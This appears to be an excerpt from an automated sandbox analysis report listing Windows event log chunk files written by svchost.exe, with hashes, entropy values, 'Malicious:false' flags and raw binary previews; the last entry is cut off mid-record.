                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.9991604740921518
                              Encrypted:false
                              SSDEEP:384:+h1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDe:+MAP1Qa5AgfQQzy
                              MD5:2E147AB218440934D79EE695F1C11233
                              SHA1:50E4AB8FB1E7AABB82EA29EF31D36D98BD2BFE60
                              SHA-256:D1586342BF0A93CBD5D99975944D70CDB5CE6457CEDAE931ACC50A2A55E7E0D2
                              SHA-512:B60F81C2F53138D8FA9B2B97208FFA306C7B9AD33A7E377DFA53CF29C280BA8774B62716DDE70A44BAD1DAC488518A021C07B6CD85CCDED4DBA85AD052CECCF2
                              Malicious:false
                              Preview:ElfChnk......................................c...f..........................................................................vc.)................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&.......\......;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.441017411582523
                              Encrypted:false
                              SSDEEP:384:BhdERE5EUELEvE/EpEbEmEfEjoPjE4FEqEZEVEiEUhqEd/2EME0EHE+EIy4qEQi0:BQoPjvh7jhHl7lzuzbCN7y+D
                              MD5:8D30244BF7119CFA2F8A7A5AF8FCDAB7
                              SHA1:F0827675265E0DF98A4967D8A539D476551DCAA6
                              SHA-256:489E810931FD45E6D7620FE65EBF1F1A66235B06E572C2C293BD080EE1C8E1ED
                              SHA-512:C71504A8F8D370825FC0C8C605B9F7217EFF2025838ED8FDF3F04CCC41E86751659BB60C7E79C48BBDDC1089C771DD16A193C107DDE4A1487F037BB2FC1455B8
                              Malicious:false
                              Preview:ElfChnk.q...............q....................i..Pk..buI......................................................................o._................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F........................................7...(..................};...........?..M=.......9..............U*..&....$..........."..............=1......**......q........|.xf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):3.2803522685445374
                              Encrypted:false
                              SSDEEP:384:RhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl0:R1T4hZovIZC7
                              MD5:4A70DB2946C129829BEDDB2E147FBE04
                              SHA1:4D3255FABE0E857840591072D9370047FDDFB83A
                              SHA-256:C10981A84E3884E62907E34159FB7AA2D1F908C3E328D8D8B942B9934DFDE09C
                              SHA-512:7FDBE43D4773CBC17A3879CBC012F8C9FC823529DDF6FE5E10C623B2D7AA89159132F10FE01C0632B6F8F92A0C474C67EF1D5DA4DC2EDC3CA5499D6220922AA4
                              Malicious:false
                              Preview:ElfChnk.........k...............k...........................................................................................<../................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):2.445920452673848
                              Encrypted:false
                              SSDEEP:384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDff:izSKEqsMuy6SbKrTPpOIKm
                              MD5:21B26F726BBEBA7FD5C4C45386FC544F
                              SHA1:F6CC3E80D2AD9D2F420C42D7DA3AA3C48C9D956A
                              SHA-256:63E1A62EA280BF1B031E1C98FBF21FF88795119983E5BC96C036B8EEF30D325D
                              SHA-512:A28CB789E4967DB231359AFE7D221C55A57FB56EF899997EBAA0F79EBD92D34547530A64B4B5492400ABFC81631E5ED792D47B836525E5E1583BA6F656062DD5
                              Malicious:false
                              Preview:ElfChnk.........L...............L......................f....................................................................s.J.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........................................f......................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):2.1562721664799103
                              Encrypted:false
                              SSDEEP:384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3z2:Bmw9g3LQ
                              MD5:B2C3D7448B237C268D23FE1A78777AA5
                              SHA1:6C3A39325392F2B088C00CDC1763268F15832447
                              SHA-256:05BC150DCBE6B62CE7D2A9CB8F706130DF70BABC54752199B02B4C91ACEE1C4E
                              SHA-512:F9286BC0FC6DB6C52295C0292E2BF732C010F2D542999085F999501AC555C317FB1AFED9A2FF2DF6D91913373D0A32D2307C707381419883F5605F1D67DEE70E
                              Malicious:false
                              Preview:ElfChnk.........6...............6...........(o...p....Zo....................................................................ZU.#................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#.......................................^^......................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.9195298486885948
                              Encrypted:false
                              SSDEEP:384:3hPIRbiY8SIUIi0IsIGIAICI5I2IBIaIKI+I3lKaZrIVlKaZOITTIwI:3LQ9KC8KCV
                              MD5:D4A00CC59E964B7DFD6EFDB643322E9E
                              SHA1:7307AF862B22D743BF6B531829DABE041E9F1F92
                              SHA-256:49414D51861772E0899416FE42628F8641622E9F793F435DE7F0118F45EDE065
                              SHA-512:51663BF2E9D8F1FA3BA6B87918CD36A02AFC2F53FF89F3ED104A4B4129682F0947DC825912A81844E2D25083E7249CE7C1EE8F899D847F511AB20B0404B22F27
                              Malicious:false
                              Preview:ElfChnk.K.......L.......K.......L...........x...86..........................................................................E.U.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...K.......1..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
                              Category:dropped
                              Size (bytes):69080
                              Entropy (8bit):0.5731539143121821
                              Encrypted:false
                              SSDEEP:96:435NVaO8ioBOPKzUmOPZXOOPoQ5NVaO8ioBOPKzUmOPZXOOPo:437V7cOP4XOP4OPz7V7cOP4XOP4OP
                              MD5:3215BB454414F0861355E062F441131B
                              SHA1:CC4D9DE3AE6F9F5366A1429DCC592349FAF3207A
                              SHA-256:2F51CA78F4B08A2AED583B995662BDEB99822BCC8AF3FC2A85C4C8D2EC91451C
                              SHA-512:9B556C7F51A82DC7D718E7F94F2C62540EBA2C8A0D7E7922884AAA878D073B61808FE5A8CD1E993D66FCA3DC853DC07909C46D8C96E705FF66084998E1B0391A
                              Malicious:false
                              Preview:ElfFile.........................................................................................................................ElfChnk.~...............~...................`...X....+.....................................................................ehq&................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..p...~.........Jf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):5.712800314026489
                              Encrypted:false
                              SSDEEP:384:jhKa5SzuzNz0zxzuewKWMKFza5rta5ya5e69a5nla5f2KnzyzIzka50bba5Wa5HJ:jfSik7ELy7KR6Cx0INAG
                              MD5:1EBFD1F27E1F9FAC086C1B19A7D5E927
                              SHA1:43501F2C49CF111F203E67E38D48DA155A118524
                              SHA-256:EA28E3CB2A066ACFE3B9E49DC53158C69D01780DFED91E6B1E4A41716C92D144
                              SHA-512:2081B56F975355F7E6F41742EFC2D645F0BC07708427F18EA3EF4B6C3B7AEE5855A2C2CF9A7A8F06928B342F3D82181FBB2C542EF708AE151AA6B61EEC9FD922
                              Malicious:false
                              Preview:ElfChnk.....................................H...@...Y.~................................................................................................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................V...........................1...{!......**...............O..e.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.119748237037944
                              Encrypted:false
                              SSDEEP:384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpRaMRlM7kMGU:SeJB
                              MD5:D1CFC256BC075DC75D7FD92207C9C0F2
                              SHA1:587C19CF65305AD470E82AB5A1ED5B2E36472625
                              SHA-256:6C0365C674BCE55E0C49A62D23782660D34ECB388A8A7418AD9A75DFD36E612E
                              SHA-512:85F88C26274975D8EB8DDC65297064427A103B557712BD46F459B8E26A1B7E38DA3B4674920FA61476D108BA3B9846430F59AA82926AFEBDCE92B25A527331A3
                              Malicious:false
                              Preview:ElfChnk......................................1..p3..\q........................................................................_U........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................,......................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.182756017330751
                              Encrypted:false
                              SSDEEP:384:9hk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:9BjdjP0csdHkp
                              MD5:9BA8F6B60705B6A27084436D1D4370AD
                              SHA1:DCAFEC9C3F76CCE3FF65F8FED6E373B863780B6E
                              SHA-256:580E71D95D6201104E37944E8A0A6596869D6C8A0CA2CD3B704FEFC9D319C957
                              SHA-512:BFBAEA71174AEE5233857BFDB4427C59D945A3797EA6F5D02708807321E0ADD12ED632BAA3C5E59141CFEF108FADE90315AB670BB960A281D0E95DB18C4976A4
                              Malicious:false
                              Preview:ElfChnk.....................................8.......I#.e......................................................................hB................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):3.140387557527179
                              Encrypted:false
                              SSDEEP:384:B3hDIEQAGxIHIFIWwIfyITMIcIZIMIf0ITEIAI/IuIGvqIfIOIOIv0IfCOiIThIe:B3ZxGe6dSS
                              MD5:A5A04FB3E58E4B7633C7581966A2ED15
                              SHA1:735EB21B3BA2BC8B7A2D52B0BF1FC64E1CEA7295
                              SHA-256:3AC90621C625D7A73EF0CFEDB3DC6A4DE3E6F64965593FF4167F61113B0190F3
                              SHA-512:4E26D6FA25DC4D3249B5FB86E96870243E9B6A9E85684D2D6DEE0A9DB7802EE412EA18D6EE64F2128A7B6DEFE3CFEBC22C9F6F89CA49B4C0EF10388F3832A7B2
                              Malicious:false
                              Preview:ElfChnk.T...............T...........................ky.'...............................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1............................V...........6..........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.800476718060657
                              Encrypted:false
                              SSDEEP:384:7h6iIvcImIvITIQIoIoI3IEIMIoIBIzI9IwWInIE1IFtI:7oxqV
                              MD5:F25E3A5940E51F9A49AC271DE377E2C1
                              SHA1:38EB4D0BCB8EA4C72C03AD88CF9B7136C39BCDC5
                              SHA-256:D2B29761907A72BE3EC03C586D87729FF91EE3D9A6CF39319FD90A1977602663
                              SHA-512:CADA8EFD9868D26AA1B4DBC5A5BDD31E624547E5755ED7B413EA74D69AB731B000BB2B8FCBDD3027FDA278A7D69058DF4BE3BAEE5AB253055C70EDE7D3AA9993
                              Malicious:false
                              Preview:ElfChnk.....................................X"...#.../......................................................................V)..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):2.999140584854273
                              Encrypted:false
                              SSDEEP:768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH135:o
                              MD5:5234109523F4243D8DFEEAFD9202BC60
                              SHA1:49A4B237FB8BEE3A2BDAA0C20A579E06D2645F65
                              SHA-256:D4CE68FD0E970CC24971E8258B962534A3BF7CB1F1E6209AA0BB1D09F4FB80E6
                              SHA-512:C2CC9A4E7282BF37C4113FADBA4F7FDD1D2094B8F40FE145C58A5ABEE4A90BCD55FBD8876415BD9140EBEE36314D02FEE5525076B539BB5AA01FB1D32058B426
                              Malicious:false
                              Preview:ElfChnk.....................................(...8...|.........................................................................6................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):69152
                              Entropy (8bit):4.013580942745841
                              Encrypted:false
                              SSDEEP:768:HQ+wQicZv76NcRkpHrWbGyYKQc90XEztputDBjV8k+u7e4tHpoVWWHjRKvc90X:tztputDBjV8k+u7HtHpoVW
                              MD5:5682E4E8C2E118F2B2D59E5F66CB4298
                              SHA1:54CCEB3A3A8E0B26AF8D17766313093F1F632AF2
                              SHA-256:3FB24183699B3631BEEDF7C761FC35179B78DCFD57AEF84EA652D18ABE1660A7
                              SHA-512:6D215EC4ECE7C1A8FDE878BD0F28ADFDED5FFFB10A1707693D150BF0D353DD4032240EA4021885C38D5B4AD58A3E137A741C63548744C8C075104BE1030DA11C
                              Malicious:false
                              Preview:ElfChnk.................J.......W...........`..........7....................................................................ONx.................2...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...P.......B.[t...........Z..&...............................................................8.......P.....!.................B.[t....0.U.f...."V.f.......@...P........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L..........u.e. x...**......Q.........ut...........Z..&...............................................................8.......P...C.
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.419779440632166
                              Encrypted:false
                              SSDEEP:384:RhWKyzK5SK+jKLSKDlKMAwpTKZDGKPK9KyKJSK2KVKzKAGP1K6GSKzKhMK7KS3Kt:RIgpCnz/Gh4wRub4VAPdHc08D
                              MD5:F492A17F866F277E11EBADDFB17DDDE2
                              SHA1:B4189626A2411D58BCC61FB5B000BB20463F7CDA
                              SHA-256:67172CEFF09C1BEB757C734CA01C61542B350C0B083A2CDD33E4913BA873C067
                              SHA-512:8B7CF69CBAA659F3CA0176611DB2ADC35AB330E4470F1EB7DFD7B23CFCF31CE7CA7CAFEEB1BD3EB6D0B7725C3A51E83F9B9A91E8BB4493FB516CDFCCFF33A4B6
                              Malicious:false
                              Preview:ElfChnk.........[...............[...........`..........]....................................................................t^.a................p...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................'f.......D...T.......................s..........O....p...h............../$...............}..**................qdf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.760021633915647
                              Encrypted:false
                              SSDEEP:384:4hP8o8Z85848V8M8g8D8R8E8C888FB8J8a8:4R
                              MD5:91415CB1A68CB19DCDB017402AAEB51E
                              SHA1:EEEB808B9D0DFB3DB247AA10B64290A5029EAB89
                              SHA-256:EDEE7AB462BF2D986393D24304BDEF02415A6E0483DE793BD452E169B7D08170
                              SHA-512:C2F5AF43559DCE7BB66ABE305DF2DCFF0C95E2CF431D8DD0B6A02E216C8F4329C3B888BF2BF378918851A3066976FCEE745593B60970E5B9843535E6301E5BA0
                              Malicious:false
                              Preview:ElfChnk.........................................8!..$.0v....................................................................>...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):3.764203104271766
                              Encrypted:false
                              SSDEEP:1536:MXhRUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:MXXnS
                              MD5:176F1E65123BB628ACDC88E289158866
                              SHA1:C66B66E50A7ED10D92E567B1B3AD99CC95BB13DF
                              SHA-256:EA508D1A253C409B864CBB714F8678628F68E394ABAAB844A8D296DDD4927AB6
                              SHA-512:73ECFF6243F21B5611E23963B0B7BA3ABBFD9D1F483EB2486546FD09AC0100CD01560CC2F4C856F583133B01A5C2CE32C13559547E7374BDFE30D195D9228D36
                              Malicious:false
                              Preview:ElfChnk.........'...............'............I...J..........................................................................s...................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................>..............O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):2.4373812410985773
                              Encrypted:false
                              SSDEEP:768:50VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OaafcmafEMXW0OWkjWr:jcEt
                              MD5:5166C2E32BD35C5E8D122799E53B4EA3
                              SHA1:628619C0E31F8C29ED260FCC063CD27935ACC25C
                              SHA-256:433A96E20784F1E6FB099FA4AB020EEA75BB22EEBC7D969497A31ABCB9B415AB
                              SHA-512:E5EA93AA871264E180BBC67008D7AA1012CDCAC74D22D10B47F1849380E092DF2FD798C7143DD3CAB5D9192EB4A89BB0EE60DA662E626923551906AB8F31DFD9
                              Malicious:false
                              Preview:ElfChnk.........?...............?............y...{...v.......................................................................bV................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&.......>h..................................................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:modified
                              Size (bytes):78808
                              Entropy (8bit):4.128394420006791
                              Encrypted:false
                              SSDEEP:384:ShNiGQ5XpvVRYBQf5pJiT5pwiT5yY4iT5pBiT5pDiHcbik5pKik5yY5Lbik5p9if:S1LpBVi7CPqmxVJEX
                              MD5:7E147460AE44203D5277F84C41DACC45
                              SHA1:28036301B4CDEBE6C63041C496C2259ED2F3E0BE
                              SHA-256:F4D0F983D820C8F03047D00EAB05D9BE3A13ED33EB5D74003BBC8B274F426C88
                              SHA-512:43A5368ADB6283D5D1E9505D6F709D628898EA361BAB48374CFE515B6EB6696DB715D949F49083608EE0A8E5D40DE2A40DAE6F2232EBC171F27DAFCCB65640AC
                              Malicious:false
                              Preview:ElfChnk.'.......,.......'.......,...........`+..`...T..........................................................................................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...............................................................&.......................................**......'...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.322146858454247
                              Encrypted:false
                              SSDEEP:384:NH6/hDGCyCkCzCRCFC5CdCbCHCQCrlC+C2CV2CfCrUCECZ/C/C/2a22j2EW2z2/5:NH6/d7kNrTgt
                              MD5:D8DABE7AC7FE8F2D1CD853002971BB8A
                              SHA1:AC6B0F9940C1B3DB1FBC58DE8A95DD252FA73A6A
                              SHA-256:DDC0E74C04DFDB71841128067C33E0B5388CC5E93EEA1FDA4ADDFC6CA39FCC77
                              SHA-512:A9AF55922FC793B10A17731BC7F83A70E741E695B47249993530612A11D0A41481068A4DFD4B07182F5604A4AE289211D00766B79DB67CC25171D4ECA5A9292A
                              Malicious:false
                              Preview:ElfChnk.U...............U...................`...h....fyC......................................................................K................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................F..............................&...............................................nw..............iq......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.475265357832672
